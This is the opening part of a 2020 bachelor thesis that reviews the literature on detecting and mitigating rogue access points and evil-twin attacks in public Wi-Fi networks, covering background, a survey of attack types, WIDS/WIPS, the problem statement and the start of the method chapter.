EN SUMMERING AV MITIGERINGS FÖRSLAG GÄLLANDE LAGLÖSA ACCESS PUNKTER I PUBLIKA WI-FI NÄTVERK A SUMMARY REGARDING MITIGATION PROPOSALS OF ROGUE ACCESS POINTS IN PUBLIC WI-FI NETWORKS

(1)

A SUMMARY REGARDING MITIGATION

PROPOSALS OF ROGUE ACCESS POINTS IN PUBLIC WI-FI NETWORKS

A proposal to guidelines for assisting in choice of public Wi-Fi network security

EN SUMMERING AV MITIGERINGS FÖRSLAG GÄLLANDE LAGLÖSA ACCESS PUNKTER I PUBLIKA WI-FI NÄTVERK

Ett förslag gällande riktlinjer för att assistera vid val av publik Wi- Fi nätverkssäkerhet

Bachelor Degree Project in Information Technology IT610G, G2E, 22,5 HP

Spring term 2020

Date of examination 2020-08-31 Johannes Sandberg

B17johsa@student.his.se Supervisor: Dennis Modig Examiner: Ali Padyab

(2)

Sammanfattning

På grund av populariteten utav trådlösa nätverk och dess ökade hot av laglösa accesspunkter krävs lösningar för upptäckt, undvikande samt motverkan att upplysas. Det existerar många olika tekniker men det finns ingen gyllene regel för vad som är mest passande för olika scenarier eller nätverksmiljöer. Specifikt så är detta otydligt i publika Wi-Fi nätverk.

Syftet med denna studie var att primärt hitta olika tillvägagångssätt som en laglös accesspunkt kan upptäckas, undvikas och motverkas. Men även hur en nätverksadministratör eller dylikt ska gå tillväga för att välja just den lösningen som anses mest passande för dess scenario. För att besvara detta skapades ett ramverk som tydligt ger hänvisningar till en

nätverksadministratör. Ramverket baseras på fördelar och nackdelar utav olika tillvägagångssätt medan det hänvisar till olika tillvägagångsval baserade på vad som eftersöks. Sådana faktorer kan vara säkerhet, användbarhet eller utplacering.

Studien är baserad efter en systematisk litteraturstudie, som använde tre databaser för att samla in information. De databaser som användes i studien var ACM Digital Library, IEEExplorer och ScienceDirect. Genom att nyttja dessa databaser med specifikt formade söktermer kunde en stor mängd artiklar förvärvas. Därefter kunde artiklar delas in i olika teman med tematisk kodning, beroende på innehållet av varje artikel. Avslutningsvis hade studien 37 godkända artiklar med 4 identifierade teman som sammankopplar 13 kategorier.

Genom dessa teman och dess innehåll utformades ett ramverk som utifrån olika val vägleder till passande lösningar.

Nyckelord: trådlöst lokalt nätverk, publikt Wi-Fi, accesspunkt, laglös accesspunkt, ramverk, intrångsupptäcktssystem, intrångsmotverkanssystem

(3)

Abstract

Due to the popularity of public Wi-Fi and the rising threat of rogue access points (RAPs), solutions for detecting, mitigating, and preventing it needs to be discovered in a more general approach. Several techniques exist but there are no “golden rules” to handle it.

The purpose of this research was mainly to find the different approaches RAPs can be detected, mitigated, and prevented. Network administrators can also by the help of the framework, find the most efficient solution. The framework is based on advantages and disadvantages by the different approaches while leading to appropriate choices based on what is desired regarding security, usability and deployment.

The research is based on a systematic literature review, which used three databases to collect and gather information regarding the topic. The databases used were ACM digital library, IEEExplorer and ScienceDirect. By utilizing these databases several articles were acquired, further on divided into themes with thematic coding depending on the content of the article.

In total 37 articles were collected and 4 themes were identified, which connect 13 categories.

When the several phases of thematic coding were completed, a framework was developed regarding how the most appropriate solution depending on different factors were to be considered.

Keywords: wireless local area network, access point, rogue access point, intrusion detection, intrusion prevention system

(4)

Acknowledgements

This project was supposed to be based on experiments, but due to the Covid-19 outbreak the research was stopped. Thankfully, my supervisor Dennis Modig and examiner Ali Padyab helped me redirect that research into this literature review. Even though the outbreak created

challenges, they were available and supportive in this study with Zoom sessions or actively responding in e-mails to provide feedback.

I would also like to thank my loved ones who have been supportive and cheering me on, while also being understanding. Thank you sincerely!

(5)

1. Introduction

Wireless local area networks (WLAN) have become a universalized standard in the world.

From a user with a personal off-the-shelf router to an enterprise with tailormade hardware for their highly dense and large-scale networks, to public Wi-Fi environments such as hotspots.

The reason for this is the ease of implementation, availability, flexibility, mobility and the key answer which is the reasonable hardware and implementation prices.

Another reason to the increase is the free Wi-Fi services offered to users that use smartphones and other mobile devices. The high demand for Internet services required during an average day, have led to many public locations to offer free Wi-Fi services. Such as shopping malls, cafés, restaurants, and larger events. It is forecasted that public Wi-Fi Access Points (APs) should be 454 million by the end of 2020 (Wang, Juarez, Kohm, Liu, Yuan, Song, 2019).

People that want to use the Internet can either choose between a Wi-Fi network or mobile cellular networks. Cost often make Wi-Fi the cheapest choice. But a common problem in Wi- Fi networks are the threat of rogue access points (RAPs) (Alotaibi & Elleithy, 2016).

Since APs are inexpensive, making them easy to acquire and easily setup, makes RAPs a more serious problem. RAPs are in general an unauthorized access point. Either installed on a network without explicit authorization from a local administrator or implemented by an adversary to conduct several attacks such as man-in-the-middle (MiTM) attacks or to perform espionage or launch other attacks (Sriram, Sahoo, & Agrawal, 2010). Wireless network clients might connect to a malicious AP, due to RAP attacks such as Evil Twin (ET). Evil Twin is an approach to create a malicious RAP that replicates a legitimate access point (LAP) as identical as possible (Kuo, Chang, & Kao, 2018).

But it is troublesome to mitigate RAPs, especially in public network enviroments due to the lack of security implementations available. Unaware users often are the victim, the rising threat of RAPs are also easily deployed and hard to mitigate in many scenarios. RAPs usually focus on the unaware user. Leading to privacy leakage, confidential information and even property damages. Due to the problems of RAPs and its rising popularity makes it crucial to be mitigated (Wang, Juarez, Kohm, Liu, Yuan, Song, 2019).

The report is divided into eight chapters. Chapter two presents a background to public Wi-Fi networks, attacks and a more thorough background for rogue access points and current countermeasures. Chapter three will explain the problem and motivation for the conducted study and what the aim of research is. Chapter four explains the method and analysis, as well as the practical execution of both. Chapter five presents the results from the practical

execution in chapter four. Chapter six presents the analysis and framework. Chapter seven discusses the work and results from the author in different aspects. Chapter eight is a conclusion of the completed work.

(9)

2

2. Background

One of the most common communication technologies in our society is Wi-Fi. Wi-Fi is a reference to wireless local area network (WLAN). Wi-Fi is an IEEE 802.11 standard which enables routers and other devices such as smart phones, laptops etc. to communicate with each other. The 802.11 standard requires high radio frequencies to function which are 2.4 GHz and 5 GHz. The popular increase for Wi-Fi is primarily the ease of implementation, availability, flexibility and mobility and the key answer which is the reasonable hardware and implementation prices (Kumar & Paul, 2016). Wireless networks are one of the main pillars for network infrastructure. For a wider availability and connection hunger of users, Wi-Fi is a major contribution and is important to establish a solid core in network infrastructure (Zhang, Hasegawa, Yamaguchi, & Shimada, 2019).

While technology within the area is rapidly increasing and adaption of countermeasures to new attacks are not always going hand in hand. Poor infrastructure becomes more common.

Old systems using unsecure or even outdated methods are examples of lacking security implementations. By not using WPA/WPA2 support there will not be any encryption during communication (Lee & Fumagalli, 2019). According to Vahnhof & Piessens (2017), the WPA2 protocol is generally used in modern Wi-Fi networks. Due to being almost 15 years old makes it hard to still be a valid solution to use. WPA2 establishes a key exchange protocol called the 4-way handshake and provides data-confidentiality protocols to encrypt traffic. This protocol has been considered safe for quite some time but has been cracked. There is a design flaw in the 4-way handshake, by forcing the authenticator to resend the third message of the handshake, a supplicant can possibly resend the fourth message as well.

Thus, ensuring valid security a challenging task to perform in public Wi-Fi networks becomes a challenge. One of the most applied protocols is flawed but still widely used. This can lead to security issues such as privacy and confidentiality leakage (Vahnhof & Piessens, 2017).

Wi-Fi security is crucial to the society. Many utilize Wi-Fi in places such as cafés, restaurants, and campus networks. Hackers that try the limit of security tools available to network operators are a growing threat. One of the primarily challenging threats for Wi-Fi networks are rogue devices that generate DHCP threats, DoS threats or data exfiltration (Cox, Clark, & Owen, 2017). Ma et. Al (2008) points out that detecting rogue devices such as rogue access points (RAP) is one of the IT-departments most important security functions. If

physical access is granted to an attacker, the security is compromised.

As mentioned, there is a great deal of challenges for public Wi-Fi networks. While security may not always be a priority, testing security solutions in a real environment before deploying them is not a common process by an administrator or security officer even though

recommended. Since the “come-and-go” and bring-your-own-device (BYOD) mentality is becoming more accepted, public networks such as hotspots and municipal Wi-Fi that might be implemented need to consider wireless network security in a greater deal. Examples are cafés, offices, hotels, malls, and airports. Hence the huge implementation of Wi-Fi the evil doers of Internet must be considered as well (Kumar & Paul, 2016).

(10)

3

2.1 Wi-fi network security

According to Coleman & Westcott (2014) Wi-Fi is an 802.11 standard with the main function to act as a gateway into the network infrastructure. This gateway should be protected and monitored at any cost. The possible protection and authentication methods should be

positioned to ensure that authorized users are given access to resources. But if the gateway is not protected, unauthorized access to resources is a given event in time. Exposing resources is a crucial mistake one can make. For example, intruders can gain access to databases, company secrets or confidential private information regarding a user. They further mention how a network can also be damaged if an opening is found, and there are usually possibilities to find new paths to gain deeper access. Another example provided by Coleman & Westcott (2014) is a case in which an intruder manages to shut down a mail server during business hours or spreading a trojan through the network internally. Spammers have figured out that open wireless gateways to the Internet can be abused for spamming activities. Software theft and remote hacking is a possibility of an unsecured gateway. Even though wireless networks enable an attacker to attack wired resources, all network resources might be at risk.

Information that passes through air can be captured using network tools. If proper security is at miss, management interfaces or Wi-Fi equipment can be accessed. A lot of wireless users are vulnerable to peer-to-peer attacks, but also DOS attacks. If the attacker has knowledge and proper tools it can disable the entire network service and deny users access to the network and its resources (Coleman & Westcott, 2014).

According to Ali, Osman, Mannan & Youssef (2019) there are either open or closed Wi-Fi networks. Further explained, a closed network has more possibilities to mitigate intruders in general. Because unauthorised users cannot reach resources and not everyone is able to join the network. Open networks are often referred to as public Wi-Fi, they are more challenging since there are briefer authorization demands. Because in a public Wi-Fi network, anyone and everyone should be able to access the network. An example of public Wi-Fi networks are hotspots or municipal networks. They usually use one of three categories of authentication:

• Captive portal

• Direct/open access

• Username-password

While all three are useful, captive portals are usually used. Captive portals demand the user to go through a portal session, which usually is a webpage with information as privacy policy and Terms-of-service (TOS) documents. There might be a social login or registration form.

After the user has accepted the agreements, the user gets to a landing page which the hotspot owner chooses. The captive portal is usually a good way to inform the user about the settings, data privacy, information gathering activities and authenticate guests if needed (Ali, Osman, Mannan, & Youssef, 2019). With understanding of why security is a serious problem and proper actions are in dire need, the next chapter will further explain the potential attacks a public Wi-Fi network are a victim to, as well as countermeasures.

(11)

4

2.2 Possible attacks in public Wi-Fi networks

There are several potential attacks one can perform in public Wi-Fi networks. These attacks are either intentional or unintentional which is of great deal to keep in mind. To sufficiently protect the network infrastructure, a professional generally keeps up to date of new and old attacks. Listed below are common public Wi-Fi attacks according to Coleman & Westcott (2014):

Rogue wireless devices: Rogue devices are seamlessly any unauthorized device using Wi-Fi that is not under control of a network administrator. They can be either internal or external, an employee might implement a RAP for better performing network or an attacker that

implements one to perform evil deeds. Depending on placement the threat is varying, but if the device is connected to the wired network infrastructure the threat is major. The challenges with avoiding these attacks are the fact that any Small office/home office (SOHO) Wi-Fi access point or router can act as a rogue device, which is of ease to get your hands on. A rogue device which is in no control of the administrator might also be configured without authorization and authentication security leaving it to become an open gate to the network resources.

Peer-to-Peer Attacks: An attack usually performed in Infrastructure mode or Ad hoc mode.

In Ad hoc an independent basic service set (IBSS) is the main function. IBSS uses peer-to- peer for connection with the clients. Usually sharing files is a common function to perform using Ad hoc, which means that resource access must be managed. Users connected to the same BSS and using the same VLAN, must be protected from each other since they all reside in the same layers. An attacker can exploit this to gain unauthorized access to resources.

Eavesdropping: Anyone can access the wireless transmissions if you are within range of the frequency. This means that anyone can sniff out traffic which can be prevented using strong encryption. Usually eavesdropping regarding wireless network is split up in two categories.

Casual eavesdropping: Also called WLAN discovery. This method exploits 802.11 frame exchange methods which are declared in the 802.11-2012 standard. WLAN discovery tools exists to find open WLAN networks. The tools utilize active scanning methods using null probe requests across all the channels with intent to receive a response frame containing wireless network information. There might also be passive scanning methods.

Malicious eavesdropping is the second method of choice. It is more harmful than causal eavesdropping since unauthorized use of 802.11 protocol analysers are in use to capture the wireless communications. Using this protocol analyser is considered illegal. Many countries also make it illegal to listen on any type of electromagnetic communication. The commercial and freeware protocol analysers are viewed as a tool for network administrators. Since

analysers for the 802.11 protocols are passive and can capture any transmissions within range.

The tools exist for troubleshooting purposes, but malicious intent will always exist. Strong dynamic encryption solutions as CCMP/AES is a given demand for security precautions such as data privacy. If transmissions are in clear text the messages can be reassembled and be able to read.

(12)

5

Encryption cracking: Several encryption methods have been cracked. Wired Equivalent Privacy (WEP) encryption is easily backwards compatible, tools available can crack the encryption within minutes. Usually an attacker gathers amounts of encrypted packets using a protocol analyser and then run the gathered data with WEP-crack programs.

Authentication Attacks: A troublesome attack that might expose network resources if authentication credentials are compromised. Authorization to network resources can either be given using an 802.1X/EAP method solution or the use of Pre-Shared Key (PSK)

authentication. Since the 802.11 standard does not define what EAP authentication should be used, it comes to make one of several choices where some are more secure than others.

Attackers captures a frame exchange when authentication is performed and then run the captured traffic using a dictionary tool and get user credentials such as passwords and account names.

MAC spoofing: Every 802.11 radio uses a physical address known as a MAC address, which is a 12-digit hexadecimal number. The MAC address is easy to read within layer 2 headers of the 802.11 frames. Manufactures often implement MAC filtering on given access points.

Usually MAC filters apply rules that only specific client’s traffic is allowed. But MAC addresses can be impersonated or “spoofed” which is an easy way to bypass the MAC filter.

In Windows Operation System (OS) you can simply edit the radios MAC address using Device Manager or manipulate your registry. There are also third-part software to use. Since spoofing exists, filtering is not enough and is commonly used in legacy security architectures.

Management exploits: Wireless hardware devices such as APs and WLAN controllers can be managed by administrators using management interfaces. These interfaces are accessed using web interfaces, command line interfaces or console connections or Simple network management Protocol (SNMP). Usually telnet, Secure Shell (SSH) and hypertext transfer protocol secure (HTTPS) are used for these choices. Since default settings of manufactures hardware access is listed on Internet, hackers can easily exploit this. Since management interface openings are a popular choice for attackers, default settings should be changed.

Unused tools such as telnet interfaces should always be disabled.

Attackers use openings in these interfaces to perform different attacks or gain access to unauthorized resources. If management is not protected an attacker might shutdown the device or change ACL’s to invigorate more openings. This is also a heavy task to recuperate from in large scale networks.

Wireless Hijacking: Wireless hijacking is a common attack where the attacker configures an access point software on a laptop or other device able to turn a Wi-Fi client into an access point. There is a huge variety of devices used, raspberry pi’s or Wi-FI USB devices can act as the attacker’s tool. The attacker then performs what is called an evil twin attack. The attacker configures the device to be as identical to a public hotspot or municipal AP as possible. The attacker then sends spoofed disassociation or de-authentication frames or using a RF jammer which forces users associated to the public AP to roam over to the evil twin instead. When users are associated with the evil twin, the attacker has access to layer 2 transmissions. If the attacker also has a configured DHCP-server layer 3 traffic is hijacked of the users as well. If

(13)

6

the attacker’s device is also implemented with a second NIC, man-in-the-middle attacks can be performed as well. From the attackers AP, traffic is then routed to their original network, then makes the users unaware of the hijacking. The attacker can then perform peer-to-peer attacks and remain hidden.

Denial of Service (DoS): Even though DoS attacks generally seem to be more discussed regarding wired networks, they are still existent in a wireless environment as well. If the attacker has internal information or proper tools the attacker can then disrupt or disable a Wi- Fi network by denying access to the network resources. The difficulties with DoS attacks are as in wired networks, to find the source and eliminate it. Monitoring services are a helpful tool but locating the source is a challenge. Easily divided, there are two categories of DoS attacks, either RF jamming attacks or unintentional jamming. Intentional jamming is when an attacker starts to cause interference in unlicensed frequencies.

Unintentional jamming are DoS attacks where there is no intent of causing harm. Perhaps a microwaves interference’s or another access point interferes on an unlicensed frequency.

Vendor-Specific Attacks: Security holes in vendors firmware is often a regular situation.

When they get known, attackers quickly exploit them while the vendors as quickly as possible try to fix the security breach and deliver an update. In a network infrastructure where the administrator is not up to date with security events and does not get the fix in time or even ever, attacks will occur.

Since public Wi-Fi has its limitations regarding authentication, all the earlier attacks

mentioned makes it a top priority to consider solutions to prevent them. But the RAP attack is a growing and popular approach to attackers (Alotaibi & Elleithy, 2016).

APs are inexpensive, making them easy to acquire and setup. This also applies to RAPs which makes the cost of the attack benifical. Many users use public Wi-Fi networks which increases the chances to connect to a RAP such as ET approaches. ET is an approach to create a

malicious RAP that replicates a legitimate access point (LAP) as identical as possible (Kuo, Chang, & Kao, 2018). Unaware users will most likely be the victim which leads to leakage, confidential information, or further causes. Due to the problems of RAPs and its rising popularity makes it crucial to be mitigated (Wang, et al., 2019).

As mentioned, a whole city might be providing users with a public Wi-Fi providing a captive portal but rogue devices tricking people to connect to rogue devices and DOS attacks that might create economic losses are a very real threat and can as of now already be happening.

Useful solutions provided from earlier research indicates that a central monitoring solution can prevent a lot of attackers with either a WIPS, IDS or IPS (Ali, Osman, Mannan, &

Youssef, 2019).

(14)

7

2.3 Mitigation against rogue wireless devices

Rogue devices differ depending on implementation performed. There are roughly four types according to Ma, Teymorian & Cheng (2008) which are: unauthorized, improperly

configured, phishing and compromised APs.

• Unauthorized APs - A co-worker or an attacker that implements another AP and connects it to the internal LAN without the administrator’s permission or knowledge.

• Improperly configured - APs are defined by either the administrator has poor security knowledge, non-updated drivers are used, or faulty firmware/software is used. It can also become improperly configured in cases of physically damage or that it has multiple network cards.

• Phishing – APs are fabricated by an adversary with the intention to perform phishing attacks.

• Compromised – APs that have been compromised by an attacker to reveal security credentials. They are hard to detect and extremely threatening in commodity Wi-Fi networks. Since the AP is not malfunctioning or indicate any faulty behaviour.

One of the most threatening RAP attacks according to Kuo, Chang & Kao (2018) are Evil Twins (ET), it is an unauthorised and phishing RAP attack performed with intention. It copies the Service Set Identifier (SSID) which is basically the wireless networks name that is visible in the user’s device when searching for Wi-Fi networks and the MAC-address of the

legitimate access point (LAP). If the adversary uses two wireless network interface cards (WNIC), there is possibilities for eavesdropping on communication. ET are the WLAN equivalent of phishing scams. Many compare the ET as the WLAN equivalent of phishing scams (Kuo, Chang, & Kao, 2018).

Mitigating rogue wireless devices is not completely obvious. There is physical security like hiding the APs and ethernet plugins to prevent internal attacks but from an external view its challenging. MACsec is a solution as well, but since spoofing is an easy attack to perform it is not completely safe. Instead, higher security procedures are needed (Coleman & Westcott, 2014).

2.3.1 Wireless Intrusion Detection System

Wireless Intrusion Detection System (WIDS) is an extension of Intrusion Detection Systems (IDS). WIDS inspects packets transmitted and compares it to some sort of filter to evaluate if the packet contains anything that might be a potential risk according to the filter (Suresh, Sukumar, & Ayyasamy, 2020).

According to Coleman & Westcott (2014) WIDS can prevent rogue devices but also DoS to some extent and hijacking. It monitors at best on layer 2 to prevent MAC spoofing,

disassociation and deauthentication attacks. They might be configured by up to 100 different security risks. But since they are intended for layer 2 detection, layer 1 attacks such as RF jamming can only be handled by a spectrum analyser. Spectrum analyser is a tool used for

(15)

8

detection of frequency domains. It can detect both intentional and unintentional jamming.

Spectrum analysers get categorized after being mobile or distributed. Mobile is the common solution. Distributed can detect and classify the RF interference which is helpful to locate the interfering device. Some APs got an integrated spectrum analyser card to offer a low

functionality (Coleman & Westcott, 2014).

2.3.2 Wireless Intrusion Prevention System

Wireless Intrusion Prevention Systems (WIPS) monitors the WLAN after malicious or odd behaviour. It can also react to suspicious activity by blocking or prevent the activities. It combines a firewall and IDS. WIDS detect suspicious packets but can also act as a proactive solution by preventing the attacker in different ways depending on implementation. For a WIPS to be effective, it should be able to automatically detect and classify wireless threats.

They have a well-developed recognition of continuous attacks and an active response and prevention of attacks that will occur, have occurred or is occurring in real-time (Chen, Yao, &

Wang, 2009).

A WIPS categories APs and client radios in four or more classifications which are infrastructure device, unknown device, known device or a rogue device. Depending on vendor, different naming or categorizing might occur (Coleman & Westcott, 2014).

(16)

9

3. Problem

The Internet has become a great tool to our society and is a key factor when considering infrastructure. To further extend connectivity Wi-Fi technology is implemented. Wi-Fi

features mobility and quick and easy setup which makes it an economical and scalable choice.

A problem with Wi-Fi is weak security considerations and weak policies that generally become implemented. This introduces security threats, just as easy as an off-the-shelf AP can be implemented by an employee, a rogue AP can be implemented by an attacker. Users are commonly unaware of the dangers associated with wireless access. Few consider the potential threats when connecting to a network, especially to public Wi-Fi (Jang, Kang, Mohaisen, &

Nyang, 2020).

Agarwal (2019) explains the ease of sniffing traffic in wireless communications. Since an attacker solely needs to be within broadcast range of the transmitter for passive sniffing. This is also a challenging task to apprehend. He also mentions the great deals of threats regarding public Wi-Fi security and points out rogue devices and evil twin (ET) attacks as major concerns. But to mitigate ET attacks and alike, deployment of tailormade hardware, precise tools/devices, white lists of legitimate APs or modification of protocols may be needed. They might be useful under specific network conditions but due to false positives, scalability, and the expenses to deploy and maintain are major concerns to keep in consideration (Agarwal, 2019).

As mentioned earlier, rogue devices pose a great threat to wireless network security. As Hui- young (2020) further points out, users are often unaware of the threats in wireless networks.

RAPs are hard to detect even for professionals. This makes RAPs especially dangerous in networks with unaware clients. Confidential data or private information might be

compromised, which could lead to a vast amount of problems for companies or users.

According to Liu et al. (2019) Wi-Fi is a major communication utility to connect wireless devices in LANs and Internet of Things (IoT). Regarding IoT they point out the fact that billions of devices relate to the use of Wi-Fi since its ease of implementation. The issue is the amount of wireless network security threats that expose them.

WEP, WPA and WPA2 is faulty and there are security issues regarding the protocols.

Traditional network security is not solvable since most attacks appear at the data link layer.

Hence, better options need to be provided (Zhang, Hasegawa, Yamaguchi, & Shimada, 2019).

Kao et al. (2014) discuss how RAPs can either be setup by a user for bypassing network rules to get a less strict Internet experience. The second is with the malicious intent of capturing user credentials with packet sniffers or phishing web pages (Kao, Chen, Chang, & Chu, 2014). The phished web pages might be a captive portal being identical to the originator’s version (Vansickle, Abegaz, & Payne, 2019).

Administrators and IT-departments are having trouble handling RAPs in an efficient and sophisticated manner. Since public Wi-Fi environments are implemented in different

environments such as schools, municipalities, organizations, and businesses. There are several

(17)

10

techniques to mitigate rogue access points. All proposed techniques have their advantages and disadvantages to consider (Zhang, Hasegawa, Yamaguchi, & Shimada, 2019). This may be overwhelming for network administrators and others that are involved in charge of deploying a proper solution in their correspondent environment. Due to the amount of choices and factors that may vary, guidelines are needed.

There is a large risk for users to connect to RAPs. Even though different techniques exist, it’s still a challenging task to apprehend for network administrators. Mainly because of the economical reasons since certain implementations are expensive such necessary tailormade equipment to fully provide a complete WIPS solution. But also, all techniques are not available to implement in every possible scenario due to several factors. A solution that is effective at detecting RAPs while being inexpensive and possible to implement in different networks is needed (Vanjale & Mane, 2014).

Given earlier mentions, there is a lack of guidelines for possible solutions, or rather a framework. Development of a framework may help an administrator to select a proper solution depending on specific factors. This is of use to extend the available resources,

improve the infrastructure and be an effective and less time-consuming way to mitigate rogue access points. There are no clear directives to what the best practices are in public Wi-Fi networks, existing frameworks tell the different advantages and disadvantages. A framework that helps network administrators etc. in guidance to a better public Wi-Fi security is needed.

The framework needs to consider the different environments and scenarios.

3.1 Motivation

Many users make use of WLANs daily even though threats exist. The threats are either that unknown gateways to the network becomes setup unintentionally or avoiding access-control lists (ACLs) by an employee or a user. But also, the malicious threats that are intentional, such as phishing, sniffing, DoS etc. It is simply a question of time until something highly crucial will occur.

Wang et al. (2019) mentions that about 454 million public Wi-FI APs will be implemented worldwide by the end of 2020. Many mobile users are not keen to inspect if the Wi-Fi connection is legitimate to avoid connecting to a RAP. Accordingly, about 25% of all the existing public Wi-Fi APs were shown to be either rogue devices or compromised APs by a hacker. The main purpose of these are gathering of personal information such as user credentials (Wang, et al., 2019).

There are already documented events such as the incident with Sochi Olympics in 2014. The incident records that an NBC News reporter proclaimed that his computer got hacked almost instantaneously at the Russian Olympic Village. Similar attacks have also happened in Rio Olympics where huge amounts of public Wi-Fi APs where discovered to be stealing personal information from tourists. Now a greater deal of warnings is given regarding tourists visiting places of interest, advice follows to enable your firewall and to utilize VPN’s (Amir, 2018).

(18)

11

The most common knowledge currently regarding RAPs mitigation is that there exist four types which are unauthorized, improperly configured, phishing and compromised APs. To mitigate them is to monitor and examine the network. Other solutions are on the physical security level, like hiding the AP and ethernet plugins. Also, MACsec, WIPS and WIDS are proper ways to mitigate and apprehend such attacks (Ma, Teymorian, & Cheng, 2008).

All the mentioned mitigation techniques come with flaws in one way or another. Since security mechanisms are at a loss cause of WPA2, demands for a non-pre-shared information mechanism will be needed. There should also be possibilities to use on all sort of devices.

Research is being made regarding mitigation, but the research is wide and broad since the subject itself is the same. To subdue the problem a framework or best practice that is applicable in multiple scenarios and environments needs to be developed. The reasoning is that users/clients are unaware of RAPs while professionals are struggling in mitigation and prevention of them, and it is a troublesome task to handle. There are several frameworks that one could implement, but only in specific scenarios/environments and they might require a higher level of understanding of techniques such as changing protocols. Or they could be economically heavy such as tailored WIPS or WIDS. If one implementation is not possible to implement, another must be discovered. The need of a framework that could give insight, understanding and simplify for those in need. It would act as a guide for professionals such as network administrators, system administrators or security officers in need of guidance or assistance to discover newly proposed techniques and solutions that are fitting to their current or soon to be implemented public Wi-Fi network.

3.2 Research goal

The goal of this study is to create a framework applicable to public Wi-Fi networks. The framework will propose different ways on how to mitigate and handle rogue access points depending on several factors. This will be done with a systematic literature review through using earlier performed work regarding rogue access point mitigation. This summary of research will hopefully shed some light to what software and proposals exist and their best practices in relevant network environments. Since RAPs is a challenging and apprehending problem in public Wi-Fi networks. If patterns exist in the papers to be studied, they will be presented. What solutions are of use, what separates them and what seems most redeemable depending on factors?

Furthermore, the research question is:

How can rogue access points be mitigated in general scenarios and environments?

(19)

12

3.3 Previous research

RAPs are a wide and researched subject. There are numerous attacks one can perform with the use of RAPs. It is therefore urgent to prevent or detect the rogue AP and eliminate the source to avoid both the threat but also the attacks that might occur.

There are several proposals and techniques regarding detection, prevention, and elimination of RAPs. The solutions may vary from small and simple to large scale installations of network hardware or software, making it hard to choose the most appropriate solution in different circumstances.

Anmulwar et al. (2014) tells how detection of RAPs can be categorized into three categories.

These are client side, server side or the hybrid approach. The client-side is constrained in comparison to a server-side approach. Since a client-side makes use of the client’s device, such as a smartphone or laptop. They are limited in computation power and resources.

While a server-side uses some sort of server as a solution. If the approach is unavailable to detect a RAP, the client will be unable to refrain from connecting to a RAP. The combination of the two, client-side and server-side are called hybrids. They prove to provide a valid solution to detect and prevent rogue APs, since involving both a client and server helps to eliminate the disadvantages or impose redundancy when failure is occurred (Anmulwar, Srivastava, Mahajan, Kumar, & Kumar, 2014).

Samra et al. (2015) informs that RAPs can be categorized into unathorized AP, phising AP, improperly configured and compromised AP. Further they point out compromised APs as one of the most threatening categories while being hardest to detect among the four types. While Alotaibi & Elleithy (2016) refers to that RAPs are classified into four categories which are:

Evil Twin, improperly configured, unathorized and compromised.

Samra et al. (2015) acknowledge how current techniques can be useful to detect different attacks such as Man-In-The-Middle (MiTM), Denial of Service (DoS) and other malicious attacks. But the techniques can’t fit into every scenario. Instead they proposed a solution that relies on MAC, SSID and signal strength of the access point to help decide if a AP is

legitimate or not. This is performed by filtering, the MAC of all visible APs are matched in a white list. If the investigated AP does not match it will be dropped. They also take MAC- spoofing in mind, by passing the packet to anomaly detection sensor that use different tools like Ettercap, Wireshark, Snort and Anomaly detection heruistic payload shifting to filter unathorized APs and to detect different attacks. Their proposal can detect ARP spoofing, DDOS and smurf like attacks.

Alotabi & Elleithy (2016) proposes a solution based on IP traffic. It requires large amounts of sensors for better coverage but it is automatic which makes it less time consuming but still not cost-efficient. As it depends on a APs signature such as SSID and MAC makes it weak to signature spoofing showing it to be inefficient in mitigating RAPs. They applied RF sensing to detect RAP with a white list of legitimate APs (LAPs) MAC-address. All unathorized APs that do not match the list will be flagged as rogue leading to large numbers of false positives.

By the help of anomaly detection sensors attacks can be detected and forwarded to the

(20)

13

shadow honeypot for validation. Results obtained from this process indicates the false positive and false negative rate on the basis of deciding if the abnormal AP is a rogue or not.

By returning the results to the filtering and detection stage for future detection. It improves the performance by reducing the amount of false positive rates in comparison to the earlier proposed Shadow honeynet solution. The proposed solution deems to be useful and

automated. But requires a whitelist of all authrozied APs and large numbers of anomaly detection sensors for better coverage. It is not tested in real enviroments as well.

There are several techinques to detect a RAP, unfortunately they are inefficient and often inaccurate in one way or another. Seemlessly they cannot handle all RAP types that exist.

Some of the techinques require active addition to traffic, other require protocol modification.

(Alotaibi & Elleithy, 2016).

The perfect RAP solution described by Alotabi & Elleithy (2016) should be able to detect all RAP types that exist. Preferals besides that would be a passive approach to avoid an increase on network traffic. While also being able to cover a complete WLAN and including all possible channels and frequency bands. The solution should avoid using easily spoofed identifers such as MAC or IP addresses. To increase robustness in the solution, higher-layer protocols such as TCP ACK should be avoided. Detection will be negatively affected, while also are ineffective against deauthentication/dissasociation RAPs. Approaches that either require protocol modification, additional hardware where sensors are an exception should be avoided. Since these solutions become cumbersome, costly, challenging to implement and can cause incomaptability errors. Further, a solution that is applied to the AP is not eligible, since it would require the task of detection to be shared (Alotaibi & Elleithy, 2016).

Disadvantages in these works is that the distinct weaknesses in WPA2 is not included as the research was performed prior to the crack being exposed. Making them outdated and not with a focus on solutions to RAPs in Wi-Fi networks. Not every RAP mitigation technique is practical for every scenario of a network administrator either, several advantages and disadvantages are provided by each technique and solution as well.

(21)

14

4. Method

The report aims to summarize and conclude earlier research regarding Rogue Access Points to develop a framework. This includes matters as mitigation techniques and guidelines. The goal is to disentangle confusion and disarray regarding the subject. Since most articles regarding RAPs is proposals and not solutions, one must assemble all viable information and assemble patterns with the aim to make “refreshed” and proper guidelines. This report is of importance since the threat of RAPs are a subtopic, yet a great menace regarding the subject of wireless network security.

Scientific research involves problem solving through a controlled and systematic knowledge search (Carlsson, 1990). To perform this study, an appropriate method must be provided.

Since a lot of research already exists of the subject a literature review seems appropriate.

According to Backman (2018) a literature review is highly dependent on earlier research.

With a large scale of information, the literature review will most likely gather information of relevance to conclude and summarize viably. A literature review according to Kitchenham (2004) aims to identify, evaluate and to interpret the available research of relevance. In regard to a specific research question, topic, phenomenon or case of interest. This motivates a

literature review as appropriate, due to the large amount of available research.

Kitchenham (2014) also points out that systematic reviews is a given choice to summarize existing evidence of a technology for empirical evidence. It can also identify gaps in the current research to suggest new areas to investigate or revisit.

Backman (2014) tells that a problem with literature reviews are the fact that they are time consuming and will be of no use if the study is not conducted with thoroughness and fairness in mind. But if a literature review is performed well and with the proper knowledge about method and subject, breakthroughs to the public will most likely occur.

Kitchenham (2014) argues the disadvantage to relate to traditional reviews that lacks clear procedures and fails to generate any substantial scientific value. Systematic reviews make it possible for readers to determine and evaluate the research and its impartiality. A proper systematic literature review will most likely generate high regards of objectivity.

